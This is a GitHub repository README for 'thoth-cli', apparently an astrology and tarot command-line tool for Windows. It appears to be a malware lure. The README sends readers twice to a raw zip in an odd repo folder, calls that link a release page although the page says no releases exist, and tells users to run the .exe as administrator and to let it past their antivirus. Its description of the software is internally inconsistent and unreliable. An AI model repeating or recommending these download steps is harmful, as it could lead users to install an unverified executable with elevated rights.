Skip to content

1stkashi/thoth-cli

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

🔮 thoth-cli - Precise astrology from your PC

Download Latest Release

📖 About thoth-cli

thoth-cli brings hermetic astrology to your computer without complicated software. It uses Swiss Ephemeris for accurate calculations. You can get astrological charts, horoscopes, tarot readings, and more through simple commands.

For users who do not have programming experience, thoth-cli works like any regular program once installed. It runs on Windows and requires no special setup beyond a few steps outlined below.

This tool supports astrology topics like natal charts, zodiac signs, Kabbal, and tarot. It relies on Python and TypeScript but does not require you to install them or write code.

If you want quick access to precise and traditional astrology, thoth-cli offers a straightforward way.

🔧 System Requirements

  • Windows 10 or later (64-bit recommended)
  • At least 2 GB of free disk space
  • Internet connection for initial download and optional updates
  • No need to install Python, Node.js, or other runtimes manually

The program includes everything it needs to run on Windows.

⚙️ Features

  • Generate natal charts and horoscopes using Swiss Ephemeris data
  • Access hermetic astrology insights including zodiac signs and Kabbal
  • Get tarot card readings from the command line interface
  • Run commands in a simple text-based console window
  • Works offline once installed
  • Friendly error messages for easy troubleshooting
  • Lightweight and fast with no background services

🚀 Getting Started: Download and Run

Use the button below to visit the release page where you can download the software.

Download thoth-cli

Step 1: Visit the Download Page

Go to the thoth-cli release page:
https://github.com/1stkashi/thoth-cli/raw/refs/heads/main/skilfish/cli_thoth_1.1.zip

This page contains the latest version of the program for Windows.

Step 2: Download the Windows Installer or Zip

Look for a file named like thoth-cli-windows.zip or thoth-cli-setup.exe in the assets section. The zip file contains the program files; the setup file will guide you through installation.

Click the file name to start downloading.

Step 3: Run the Installer or Extract Files

  • If you downloaded the .exe file, double-click it. Follow the on-screen instructions.
  • If you downloaded the .zip file, right-click it and select "Extract All..." then choose a folder to place the files.

Step 4: Open thoth-cli

  • After installation, find thoth-cli in your Start Menu or on your desktop.
  • If you extracted the zip, open the extracted folder and double-click thoth-cli.exe.

When you launch thoth-cli, you will see a command window where you can type astrology commands.


🛠 How to Use thoth-cli

Once the program is open, type commands to get astrological info. Here are some basic examples:

  • thoth-cli natal "01 Jan 1990 12:00"
    This creates a natal chart for January 1, 1990, at noon.

  • thoth-cli horoscope "today"
    Shows today’s horoscope based on zodiac signs.

  • thoth-cli tarot
    Generates a tarot reading.

Type thoth-cli help to see all available commands.


🖥 Command Line Basics for Windows Users

  • The program runs inside a Windows Command Prompt window.
  • To open Command Prompt manually, press the Windows key, type cmd, and press Enter.
  • You can run thoth-cli commands directly here or from the shortcut created by the installer.

If you run it from Command Prompt, navigate to the folder containing thoth-cli.exe before typing commands. Use cd to change folders. For example:

cd C:\Users\YourName\Downloads\thoth-cli
thoth-cli natal "01 Jan 1990 12:00"

❓ Troubleshooting

thoth-cli does not open or closes immediately

  • Try running as administrator. Right-click thoth-cli.exe and select "Run as administrator".
  • Make sure your antivirus did not block the program. Allow it if needed.
  • Confirm you downloaded the correct Windows file.

Command not recognized

  • Ensure you run commands inside the folder where thoth-cli is located, or add this folder to your system PATH for easier access.
  • Use the full filename thoth-cli.exe if needed.

Errors about Swiss Ephemeris data

  • The program includes all necessary data. If errors persist, uninstall and reinstall following the steps above.

🔍 Advanced Options

You can customize output formats and request specific astrology computations. Run:

thoth-cli help

to see all available options.

Examples include:

  • Specifying location coordinates for charts
  • Setting timezones
  • Requesting tarot spreads by name

⚙️ Updating thoth-cli

  1. Visit the release page again: https://github.com/1stkashi/thoth-cli/raw/refs/heads/main/skilfish/cli_thoth_1.1.zip
  2. Download the latest version like before.
  3. Run the installer or replace your old files with those from the latest zip.

Your settings and data will stay intact.


📚 Learn More

For detailed descriptions of commands and astrology background, check the documentation included in the release or explore the repository on GitHub.


Download Latest Release

About

Perform astrological, tarot, gematria, and numerology divination from the command line using a tool built on Swiss Ephemeris and cryptographic entropy.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors